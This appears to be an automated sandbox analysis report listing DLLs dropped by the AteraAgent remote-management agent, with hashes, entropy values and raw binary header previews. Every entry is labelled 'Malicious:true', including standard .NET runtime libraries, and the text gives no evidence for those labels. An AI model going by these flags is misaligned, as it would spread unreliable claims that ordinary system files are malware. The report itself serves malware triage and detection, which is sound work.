                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Numerics.Vectors" pub

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\StructureMap.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):284200
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.117049966728456
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:WZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHe:kgo0WPVTXg+
                                                                                                                                                                                                                                                                                                                                  MD5:0C6AD6E963A164F2E51BB61430C60DFB
                                                                                                                                                                                                                                                                                                                                  SHA1:43628C0A6A2BF87EDD57FB524EFB1DF7D0189E17
                                                                                                                                                                                                                                                                                                                                  SHA-256:D99BDAA6F59A3B7979DBEB7A55F21B92A8C5DE3B0ABB4F116942BEC2D5A61537
                                                                                                                                                                                                                                                                                                                                  SHA-512:FFC0BC29E0061840E00FFA5E67FC98086A134516F6D1FB725AA1961A00EDBA571EA86E16ED8A0B6914F6B2504395EF35AA652490FC01E331A87B9BB7818E9B42
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ...............................H....`..................................B..O....`..D...............((...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.AppContext.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.804250883647438
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:9DNxWQFWsoNyb8E9VF6IYijSJIVx5+cQJ:9DNVLAEpYi606J
                                                                                                                                                                                                                                                                                                                                  MD5:74F878419C11382888EFA50687C90834
                                                                                                                                                                                                                                                                                                                                  SHA1:9C97E0D54D4FCE82736AD950120C52A4CF380EFF
                                                                                                                                                                                                                                                                                                                                  SHA-256:F3182C56ADD5B703FB58A4253544A9EC97F40256F004A827185BDED5EE94F1BA
                                                                                                                                                                                                                                                                                                                                  SHA-512:729514467096AE0A2F6555A1F51B982952082B91C3C66097028D9646EA57AEDBE69EB499C80EFBBBE8493F15C8115DF7AAB1EE81B9AEC356E946585F3986BC0F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0.............f(... ...@....... ....................................@..................................(..O....@..................((...`.......&............................................... ............... ..H............text...l.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................H(......H.......P ......................\&......................................BSJB............v4.0.30319......l...|...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.....K.N...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Buffers.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.672115220904619
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:SrMdp9yXOfPfAxR5zwWvYW8aznNyb8E9VF6IYijSJIVxAIc:SrMcXP64LEpYi60w
                                                                                                                                                                                                                                                                                                                                  MD5:941B45F33F855408E176B2EA151C7EFC
                                                                                                                                                                                                                                                                                                                                  SHA1:BDD9621293804B660216264FFAE908B3EF9C60F9
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD13545CC86B37E825EFB6440DB73335FD40E6FAAEE6DE9CF6DB9361CC0F1A2F
                                                                                                                                                                                                                                                                                                                                  SHA-512:45AF4489089D7D534754B37402ED5CB174C123BB8E4CE327BBC7AC63D8A1266E957272B1B083F632ED2A85A8F643B51058B1375CB242FFE815C88D1B66B9FEDA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ..............................1.....@..................................B..O....`..@...............((...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Concurrent.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.903448570149305
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Hm2igOWnW8rW/tNyb8E9VF6IYijSJIVxPT89bt2:ftaJEpYi60w9o
                                                                                                                                                                                                                                                                                                                                  MD5:FA4026B55B56CE7FF0F0B4EE39C7BE1F
                                                                                                                                                                                                                                                                                                                                  SHA1:1425FAC6AC722AEEFDC5F487ACA5EA2949C84AC9
                                                                                                                                                                                                                                                                                                                                  SHA-256:3ADDF4C2DEFEF30D4CDAD56F0BBAD7349DE2337B2423391DFFBF98C25171590D
                                                                                                                                                                                                                                                                                                                                  SHA-512:8EB99731FD4E22772A31B45D77B3B0551A7D3E3382C85C0135B0391D27ACE7878EB394F24A506F3EB8DD76136828AD2C06717F0FF8E05ED74B046F352DF25EBD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ....................................@.................................t)..O....@..D...............((...`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...D....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3................................................n.o.....o.....\...........8...3.8...P.8.....8.....8.....8.....8.....8.....1.....8.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.NonGeneric.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.897847752967933
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Xnapn1iwwPWcGWT5JNyb8E9VF6IYijSJIVxagmKIFod:KDur5NEpYi600T6d
                                                                                                                                                                                                                                                                                                                                  MD5:B5BEC9ED7D73E851EFFC53D539746ACB
                                                                                                                                                                                                                                                                                                                                  SHA1:8B69C95BFFC7545C08FD7176DBE7AB1505F9C2B8
                                                                                                                                                                                                                                                                                                                                  SHA-256:AE4AA1BF402777EE6217A7D599F085934A229CFDDB499F6227FC7F26105C1103
                                                                                                                                                                                                                                                                                                                                  SHA-512:93005D7AA725D9BF1D27E03E16DAD513DC762FBABF21125E71FCBB3881CD473EB18769FE2F96F8D44919DC5816A47B06CB8CCAA85AF11A3B37736AEC72830470
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@.................................p)..O....@..@...............((...`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..t.......#Strings....<.......#US.@.......#GUID...P.......#Blob......................3................................................F.o.....o.....\...........,.....,...(.,.....,...f.,.....,.....,.....,.....%.....,.................V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Specialized.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.904190588942639
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:mHLaEav5aaUa6arWVLWrMNyb8E9VF6IYijSJIVxg3z0:vPv5t/NOOMEpYi608o
                                                                                                                                                                                                                                                                                                                                  MD5:408F174F723F7B60C4600119D934BBC1
                                                                                                                                                                                                                                                                                                                                  SHA1:F0A9A40533391007B79DDB6766E7596C69D41C53
                                                                                                                                                                                                                                                                                                                                  SHA-256:2E7673528241C399D806009BEC9EB00854C0648F2074849CE1310F9FB42BEACF
                                                                                                                                                                                                                                                                                                                                  SHA-512:90C1E915D3AFCAEC7A178DE6790A0C7802B425F5CDB010924F35F24C07113B8FBC4881B4B70D6CE0ACC9F2BF071EF8349C6031393FC9ADEE4F77BFF1E479873A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............)... ...@....... ..............................]!....@..................................)..O....@..P...............((...`......P(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................`.....`...t.M.................................=.....V.................q.....Z...................G.....G.....G...).G...1.G...9.G...A.G...I.G...Q.G...Y.G...a.G...i.G...q.G.......................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.759198735233295
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:96iIJq56dOuWSKeWukNyb8E9VF6IYijSJIVxHDRxQl57:DiAuEEpYi609mr
                                                                                                                                                                                                                                                                                                                                  MD5:9CA6C1AED2900254A8C151D7EEBE4628
                                                                                                                                                                                                                                                                                                                                  SHA1:FEEF5F2FF4F88276CE21F87E20CC775F01172C25
                                                                                                                                                                                                                                                                                                                                  SHA-256:80382824DA65BD224843E5FF5F5054BD2E58AC024AA3745DA71A4D82929353D6
                                                                                                                                                                                                                                                                                                                                  SHA-512:3ECA468ADE2C324E26BA38BD07DFCD6354D11AE280D9EF7F2E473F09BA81A9E79CA17DFF37355625284902EB43258AF6C0C5CF003213F041A4CE3EE0EAF6E7D2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............*... ...@....... ....................................@..................................*..O....@..................((...`......L)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..|....................(......................................BSJB............v4.0.30319......l.......#~..|.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3................................................k.~.....~.....k...........*...0.*...M.*.....*.....*.....*.....*.....*.....#.....*.....x...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C./...K.O...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.81047849375507
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Znzz+MpSaLWW0+WCANyb8E9VF6IYijSJIVx1JZ3:9pui4EpYi607t
                                                                                                                                                                                                                                                                                                                                  MD5:479445CAA7422BD82A5119B13EB1C87E
                                                                                                                                                                                                                                                                                                                                  SHA1:F1AB35C284589C4B137D44CFC7F342E616EC412C
                                                                                                                                                                                                                                                                                                                                  SHA-256:54A3C0CA57D404AD4E1FA44A704B3E7716AB135722FE75D555618C4CEB4743F6
                                                                                                                                                                                                                                                                                                                                  SHA-512:557A47072BFC697E96A6376E14301117789ACF8683FAAAF3A7F24A5DA28C6CC283E48EDE3AD41FE0FC1EBD2491C4C70E7D42821E656C33F43E50E0E390EA1121
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............B*... ...@....... ..............................q.....@..................................)..O....@..................((...`.......(............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$*......H.......P ......................8(......................................BSJB............v4.0.30319......l.......#~..t...@...#Strings............#US.........#GUID....... ...#Blob......................3............................................................V...........j.................i...........8.................S.....<...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.'...C.B...K.b...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.859061233677978
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:PGhr+YUfyHxsW/HW5zNyb8E9VF6IYijSJIVxVUx9X:ckmcvEpYi606X
                                                                                                                                                                                                                                                                                                                                  MD5:9F56AE0FB6B201BAA11308CF285C95C3
                                                                                                                                                                                                                                                                                                                                  SHA1:9F189766A2011E8A99A830D79F68BD620B9C939B
                                                                                                                                                                                                                                                                                                                                  SHA-256:B36B189333DC3CDCBF3ED807077BD95E1B11FF64D9E11C9A0450D38243F9E73B
                                                                                                                                                                                                                                                                                                                                  SHA-512:44B530811CFB382703A52F8C95FFC327D34DB17E236FFE4BA6462E76383B9C55A054798CF48346204AAD2E840E456E699ED357E945C26B16A4CCD4F8934FE832
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............+... ...@....... ....................................@.................................<+..O....@..`...............((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................p+......H.......P ..4....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................................Y.]...{.]...6.J...}.....r........... .............................................................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.TypeConverter.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16936
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.788577351501408
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:IRE+ruiA5vzWeNWdSNyb8E9VF6IYijSJIVx4Xqeagk/:IS9b2yEpYi60YmZ
                                                                                                                                                                                                                                                                                                                                  MD5:0CE8AB464B6861F26CA3CE02DB21BEF8
                                                                                                                                                                                                                                                                                                                                  SHA1:92B748856CB37B14A6473FD15B5AC214CD3B758A
                                                                                                                                                                                                                                                                                                                                  SHA-256:AF8757D694278711237B600E6C15B0C041E23CA8F1D032149AF78CC8E10B8EED
                                                                                                                                                                                                                                                                                                                                  SHA-512:AD57432D81C9D646562ABCD43582DD854C2C3C440B6A656EF2270A4B611C25DC7DAFEED476574CCEA4BAA34A25180AF8874B39E6B69F5AABDCF0BCA7BC5449FB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0............../... ...@....... ...............................)....@................................../..O....@..p...............((...`......T................................................ ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................./......H.......P .......................-......................................BSJB............v4.0.30319......l.......#~......@...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3................................;.....Y.........8...........<...........P.......................X.....q.....g................."...................I.....I.....I...).I...1.I...9.I...A.I...I.I...Q.I...Y.I...a.I...i.I...q.I.......................#.....+.....3.....;.%...C.@...K.`...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.846471332267952
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:iT+6ywnVvW0LW5SNyb8E9VF6IYijSJIVxcwe3:i998yEpYi60O3
                                                                                                                                                                                                                                                                                                                                  MD5:690EB76BAF338A2C39E259A111A40CD4
                                                                                                                                                                                                                                                                                                                                  SHA1:27906FDE17F50D650A5143AC123E84E3C6470666
                                                                                                                                                                                                                                                                                                                                  SHA-256:E70712A2789185C97D469003B70FD63CF6A47BC47C1B80C054303A758003C339
                                                                                                                                                                                                                                                                                                                                  SHA-512:89E778EFE4A089DE2E5DFF17E1B922AD85F7DD38A30F9CCCD18B36C7E63CC44C835AE30BF9B551ACA77D9267B69AE08C185FFC4B9BA7595CDA2866340405B3BE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................0p....@..................................(..O....@..................((...`......|'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...h...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....7.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Console.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.849609316466306
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:8RbzriaXT+WlEWe5Nyb8E9VF6IYijSJIVxri+teSzc:q7icodEpYi60u8VY
                                                                                                                                                                                                                                                                                                                                  MD5:A95B0C2809EE9145B95F6654095FB0ED
                                                                                                                                                                                                                                                                                                                                  SHA1:8DD2564123D2B26D4A078D2CA1B6EDC441058260
                                                                                                                                                                                                                                                                                                                                  SHA-256:87D1A7ECF54DD82F7DA55441D1E89081A1D3772815DE2029ADED8F6B098B87E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:F40D018D6D41B703E4D99D5CE00246C9DC3AF61CA4D7707FC0DB4EED4E6E92A2F01D26526F04ABD428D9425D0751C15ABFC305728C7943217B735FC46CC3571F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............6)... ...@....... ..............................9S....@..................................(..O....@..................((...`.......'............................................... ............... ..H............text...<.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ......................,'......................................BSJB............v4.0.30319......l.......#~..H...x...#Strings............#US.........#GUID...........#Blob......................3......................................................k.....?.....$.....S.................R...........!.....j...........<.....%...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Data.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):148520
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.417399057226757
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:2dYO+3m9R6e1x03BZ6bDSzZ8B0uAP+CSS:k+2jv1x0ebezWiuK
                                                                                                                                                                                                                                                                                                                                  MD5:02E51F92069C5FF7977BB4E3C6C7A4DA
                                                                                                                                                                                                                                                                                                                                  SHA1:71E61FE264D50551561066ED3AAD20F5D45CAFF9
                                                                                                                                                                                                                                                                                                                                  SHA-256:BCDAEC0B5E76819483857CD888B24F1D524AF1DB77A2E89DA8B9F037091735EC
                                                                                                                                                                                                                                                                                                                                  SHA-512:BCA5BCC36107ACB354938CA15D641C11CEA9F38BFEF83CAD6C8272D5FE625DA25ECB5EE63175EE89E0D9A65B983D9B3AFBDC1327FEDF6B7303E18213DD8FFCA2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
